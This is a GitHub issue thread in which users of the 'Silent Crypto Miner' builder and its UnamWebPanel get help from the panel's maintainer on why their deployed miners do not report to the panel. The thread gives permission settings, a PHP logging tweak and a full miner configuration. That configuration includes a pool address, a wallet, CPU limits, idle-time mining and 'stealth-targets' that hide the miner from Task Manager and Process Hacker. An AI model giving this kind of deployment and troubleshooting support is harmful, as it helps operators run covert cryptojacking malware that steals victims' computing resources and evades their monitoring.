### ISSUE TITLE
No miners in the panel

### ISSUE THREAD

**Issue by kenzoppaate** [UnamSanctam/UnamWebPanel#81]
Please help!!

Using Silent Crypto Miner Bulder 2.1.0
For pannel using my domain on cloudflaire and proxing on hestia on ubuntu php 8.0

But there are no miners in the pannel. What can i try?

**Comment by UnamSanctam** [comment]
Make sure that both the unamwebpanel.db and the parent folder has write permissions.

**Comment by kenzoppaate** [comment]
They do have all permitions

**Comment by UnamSanctam** [comment]
And if you visit /api/endpoint.php it returns "Error: Invalid data" as it should? What permissions does the database and parent folder have? 644?

**Comment by kenzoppaate** [comment]
And if you visit /api/endpoint.php it returns "Error: Invalid data" as it should? yes

 unamwebpanel.db - 777
 parent folder - public html? - 644

**Comment by UnamSanctam** [comment]
Do you get any connections from your miners if you check any connection logs in your hosting software if there are any? Can you also post a screenshot after running the miner checker (you can censor things)?

**Comment by kenzoppaate** [comment]
Well the build is working i can see it in the xmrig proxy and in the pool. I trying to reload pannel now on my hosting

**Comment by UnamSanctam** [comment]
Yes I just wanted to see that the URL is present and doesn't have any defects. You'll have to add a log to see whether the connections are received at all, so add something like 
```
file_put_contents('requests.log', file_get_contents('php://input'), FILE_APPEND);
```
at the top of /api/endpoint.php after the `<?php` and then check the `/api/requests.log` file.

**Comment by kenzoppaate** [comment]
It is working now TNX

**Comment by kenzoppaate** [comment]
<img width="1407" alt="Снимок экрана 2022-02-06 в 17 03 46" src="https://user-images.githubusercontent.com/99124503/152684624-d2001420-75f9-4b2f-82b3-ff850da30c5e.png">

why one of the miners didnot get the configuration?

**Comment by kenzoppaate** [comment]
{
    "algo": "rx/0",
    "pool": "138.201.34.214",
    "port": 7777,
    "wallet": "48XzE13nctia1CgDJJiDRYCa2wiRAhZ8qSHaKg22JfmSGMUTL9XLx7xY2SVoaZUd3oZghTvKEM8wY261gMQzz3DBNcDWD3V",
    "password": "",
    "nicehash": true,
    "ssltls": false,
    "max-cpu": 30,
    "idle-wait": 2,
    "idle-cpu": 80,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": ""
}

Is this correct for json configuration?

**Comment by UnamSanctam** [comment]
Yes it's valid but any settings not appearing there means that the miner could not connect to 138.201.34.214:7777

**Comment by y2hyy** [comment]
> Well the build is working i can see it in the xmrig proxy and in the pool. I trying to reload pannel now on my hosting

Hey if you dont mind can you share the xmrig-proxy json format

**Comment by madani2003** [comment]
> They do have all permissions

what permissions does the unamwebpanel.db need , should I tick read, write and execute?
![image](https://user-images.githubusercontent.com/95303657/153668513-7da3a4a7-9cb4-4f3a-9619-eacaf255e3a9.png)

**Comment by UnamSanctam** [comment]
I believe unamwebpanel.db can be 644 as well.

**Comment by madani2003** [comment]
![Screenshot (438)_LI](https://user-images.githubusercontent.com/95303657/153702922-3410e25b-3179-4e0d-b749-c1abeb8cd250.jpg)

Can you please check if this is right.

**Comment by UnamSanctam** [comment]
Yes that should be right, as long as your site does not force https (some do).

**Comment by madani2003** [comment]
@kenzoppaate Can you please tell me what changes you made to make the web panel work, because i am having the same issue, non of my miners are appearing
